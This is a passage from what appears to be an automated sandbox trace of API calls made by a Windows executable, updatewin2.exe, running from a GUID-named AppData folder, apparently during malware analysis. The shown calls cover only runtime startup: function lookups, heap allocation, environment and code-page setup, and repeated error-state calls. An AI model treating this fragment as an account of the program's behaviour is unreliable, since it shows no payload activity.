lpProcName="FlsFree") returned 0x76d4359f [0118.287] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0118.287] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0118.288] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0118.288] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0118.288] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0118.288] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0118.288] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0118.288] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0118.288] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0118.288] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0118.288] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0118.288] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0118.289] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0118.289] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0118.289] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0118.289] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0118.289] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x214) returned 0x1de07d0 [0118.289] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0118.290] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0118.290] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0118.290] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0118.290] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0118.290] GetCurrentThreadId () returned 0x1c4 [0118.290] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0118.290] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x800) returned 0x1de09f0 [0118.290] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0118.290] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0118.290] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0118.290] SetHandleCount (uNumber=0x20) returned 0x20 [0118.291] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin2.exe\" " [0118.291] GetEnvironmentStringsW () returned 0x5f4e70* [0118.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0118.291] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x0, Size=0x565) returned 0x1de11f8 [0118.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x1de11f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0118.291] FreeEnvironmentStringsW (penv=0x5f4e70) returned 1 [0118.291] GetLastError () returned 0x0 [0118.291] SetLastError (dwErrCode=0x0) [0118.291] GetLastError () returned 0x0 [0118.291] SetLastError (dwErrCode=0x0) [0118.291] GetLastError () returned 0x0 [0118.291] SetLastError (dwErrCode=0x0) [0118.291] GetACP () returned 0x4e4 [0118.291] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x0, Size=0x220) returned 0x1de1768 [0118.291] GetLastError () returned 0x0 [0118.292] SetLastError (dwErrCode=0x0) [0118.292] IsValidCodePage (CodePage=0x4e4) returned 1 [0118.292] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0118.292] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0118.292] GetLastError () returned 0x0 [0118.292] SetLastError (dwErrCode=0x0) [0118.292] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0118.292] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0118.292] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0118.292] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0118.292] GetLastError () returned 0x0 [0118.292] SetLastError (dwErrCode=0x0) [0118.292] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0118.292] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0118.292] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿﲣ匁㞅AĀ") returned 256 [0118.292] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿﲣ匁㞅AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0118.292] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿﲣ匁㞅AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0118.293] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x1a\x81øS\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0118.293] GetLastError () returned 0x0 [0118.293] SetLastError (dwErrCode=0x0) [0118.293] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0118.293] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿﲣ匁㞅AĀ") returned 256 [0118.293] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿﲣ匁㞅AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0118.293] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿﲣ匁㞅AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0118.293] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x1a\x81øS\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0118.293] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43acc0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin2.exe")) returned 0x5f [0118.293] GetLastError () returned 0x0 [0118.294] SetLastError (dwErrCode=0x0) [0118.294] GetLastError () returned 0x0 [0118.294] SetLastError (dwErrCode=0x0) [0118.294] GetLastError () returned 0x0 [0118.294] SetLastError (dwErrCode=0x0) [0118.294] GetLastError () returned 0x0 [0118.294] SetLastError (dwErrCode=0x0) [0118.294] GetLastError () returned 0x0 [0118.294] SetLastError (dwErrCode=0x0) [0118.294] GetLastError () returned 0x0 [0118.294] SetLastError (dwErrCode=0x0) [0118.294] GetLastError () returned 0x0 [0118.294] SetLastError (dwErrCode=0x0) [0118.294] GetLastError () returned 0x0 [0118.294] SetLastError (dwErrCode=0x0) [0118.294] GetLastError () returned 0x0 [0118.294] SetLastError (dwErrCode=0x0) [0118.294] GetLastError () returned 0x0 [0118.295] SetLastError (dwErrCode=0x0) [0118.295] GetLastError () returned 0x0 [0118.295] SetLastError (dwErrCode=0x0) [0118.295] GetLastError () returned 0x0 [0118.295] SetLastError (dwErrCode=0x0) [0118.295] GetLastError () returned 0x0 [0118.295] SetLastError (dwErrCode=0x0) [0118.295] GetLastError () returned 0x0 [0118.295] SetLastError (dwErrCode=0x0) [0118.295] GetLastError () returned 0x0 [0118.295] SetLastError (dwErrCode=0x0) [0118.295] GetLastError () returned 0x0 [0118.295] SetLastError (dwErrCode=0x0) [0118.295] GetLastError () returned 0x0 [0118.295] SetLastError (dwErrCode=0x0) [0118.295] GetLastError () returned 0x0 [0118.296] SetLastError (dwErrCode=0x0) [0118.296] GetLastError () returned 0x0 [0118.296] SetLastError (dwErrCode=0x0) [0118.296] GetLastError () returned 0x0 [0118.296] SetLastError (dwErrCode=0x0) [0118.296] GetLastError () returned 0x0 [0118.296] SetLastError (dwErrCode=0x0) [0118.296] GetLastError () returned 0x0 [0118.296] SetLastError (dwErrCode=0x0) [0118.296] GetLastError () returned 0x0 [0118.296] SetLastError (dwErrCode=0x0) [0118.296] GetLastError () returned 0x0 [0118.296] SetLastError (dwErrCode=0x0) [0118.296] GetLastError () returned 0x0 [0118.296] SetLastError (dwErrCode=0x0) [0118.296] GetLastError () returned 0x0 [0118.296] SetLastError (dwErrCode=0x0) [0118.296] GetLastError () returned 0x0 [0118.297] SetLastError (dwErrCode=0x0) [0118.297] GetLastError () returned 0x0 [0118.297] SetLastError (dwErrCode=0x0) [0118.297] GetLastError () returned 0x0 [0118.297] SetLastError (dwErrCode=0x0) [0118.297] GetLastError () returned 0x0 [0118.297] SetLastError (dwErrCode=0x0) [0118.297] GetLastError () returned 0x0 [0118.297] SetLastError (dwErrCode=0x0) [0118.297] GetLastError () returned 0x0 [0118.297] SetLastError (dwErrCode=0x0) [0118.297] GetLastError () returned 0x0 [0118.297] SetLastError (dwErrCode=0x0) [0118.297] GetLastError () returned 0x0 [0118.297] SetLastError (dwErrCode=0x0) [0118.297] GetLastError () returned 0x0 [0118.297] SetLastError (dwErrCode=0x0) [0118.297] GetLastError () returned 0x0 [0118.298] SetLastError (dwErrCode=0x0) [0118.298] GetLastError () returned 0x0 [0118.298] SetLastError (dwErrCode=0x0) [0118.298] GetLastError () returned 0x0 [0118.298] SetLastError (dwErrCode=0x0) [0118.298] GetLastError () returned 0x0 [0118.298] SetLastError (dwErrCode=0x0) [0118.298] GetLastError () returned 0x0 [0118.298] SetLastError (dwErrCode=0x0) [0118.298] GetLastError () returned 0x0 [0118.298] SetLastError (dwErrCode=0x0) [0118.298] GetLastError () returned 0x0 [0118.298] SetLastError (dwErrCode=0x0) [0118.298] GetLastError () returned 0x0 [0118.298] SetLastError (dwErrCode=0x0) [0118.298] GetLastError () returned 0x0 [0118.298] SetLastError (dwErrCode=0x0) [0118.298] GetLastError () returned 0x0 [0118.298] SetLastError (dwErrCode=0x0) [0118.298] GetLastError () returned 0x0 [0118.298] SetLastError (dwErrCode=0x0) [0118.298] GetLastError () returned 0x0 [0118.299] SetLastError (dwErrCode=0x0) [0118.299] GetLastError () returned 0x0 [0118.299] SetLastError (dwErrCode=0x0) [0118.299] GetLastError () returned 0x0 [0118.299] SetLastError (dwErrCode=0x0) [0118.299] GetLastError () returned 0x0 [0118.299] SetLastError (dwErrCode=0x0) [0118.299] GetLastError () returned 0x0 [0118.299] SetLastError (dwErrCode=0x0) [0118.299] GetLastError () returned 0x0 [0118.299] SetLastError (dwErrCode=0x0) [0118.299] GetLastError () returned 0x0 [0118.299] SetLastError (dwErrCode=0x0) [0118.299] GetLastError () returned 0x0 [0118.299] SetLastError (dwErrCode=0x0) [0118.299] GetLastError () returned 0x0 [0118.299] SetLastError (dwErrCode=0x0) [0118.299] GetLastError () returned 0x0 [0118.299] SetLastError (dwErrCode=0x0) [0118.299] GetLastError () returned 0x0 [0118.299] SetLastError (dwErrCode=0x0) [0118.299] GetLastError () returned 0x0 [0118.299] SetLastError (dwErrCode=0x0) [0118.300] GetLastError () returned 0x0 [0118.300] SetLastError (dwErrCode=0x0) [0118.300] GetLastError () returned 0x0 [0118.300] SetLastError (dwErrCode=0x0) [0118.300] GetLastError () returned 0x0 [0118.300] SetLastError (dwErrCode=0x0) [0118.300] GetLastError () returned 0x0 [0118.300] SetLastError (dwErrCode=0x0) [0118.300] GetLastError () returned 0x0 [0118.300] SetLastError (dwErrCode=0x0) [0118.300] GetLastError () returned 0x0 [0118.300] SetLastError (dwErrCode=0x0) [0118.300] GetLastError () returned 0x0 [0118.300] SetLastError (dwErrCode=0x0) [0118.300] GetLastError () returned 0x0 [0118.300] SetLastError (dwErrCode=0x0) [0118.300] GetLastError () returned 0x0 [0118.301] SetLastError (dwErrCode=0x0) [0118.301] GetLastError () returned 0x0 [0118.301] SetLastError (dwErrCode=0x0) [0118.301] GetLastError () returned 0x0 [0118.301] SetLastError (dwErrCode=0x0) [0118.301] GetLastError () returned 0x0 [0118.301] SetLastError (dwErrCode=0x0) [0118.301] GetLastError () returned 0x0 [0118.301] SetLastError (dwErrCode=0x0) [0118.301] GetLastError () returned 0x0 [0118.301] SetLastError (dwErrCode=0x0) [0118.301] GetLastError () returned 0x0 [0118.301] SetLastError (dwErrCode=0x0) [0118.301] GetLastError () returned 0x0 [0118.301] SetLastError (dwErrCode=0x0) [0118.301] GetLastError () returned 0x0 [0118.301] SetLastError (dwErrCode=0x0) [0118.301] GetLastError () returned 0x0 [0118.301] SetLastError (dwErrCode=0x0) [0118.301] GetLastError () returned 0x0 [0118.301] SetLastError (dwErrCode=0x0) [0118.301] GetLastError () returned 0x0 [0118.301] SetLastError (dwErrCode=0x0) [0118.301] GetLastError () returned 0x0 [0118.302] SetLastError (dwErrCode=0x0) [0118.302] GetLastError () returned 0x0 [0118.302] SetLastError (dwErrCode=0x0) [0118.302] GetLastError () returned 0x0 [0118.302] SetLastError (dwErrCode=0x0) [0118.302] GetLastError () returned 0x0 [0118.302] SetLastError (dwErrCode=0x0) [0118.302] 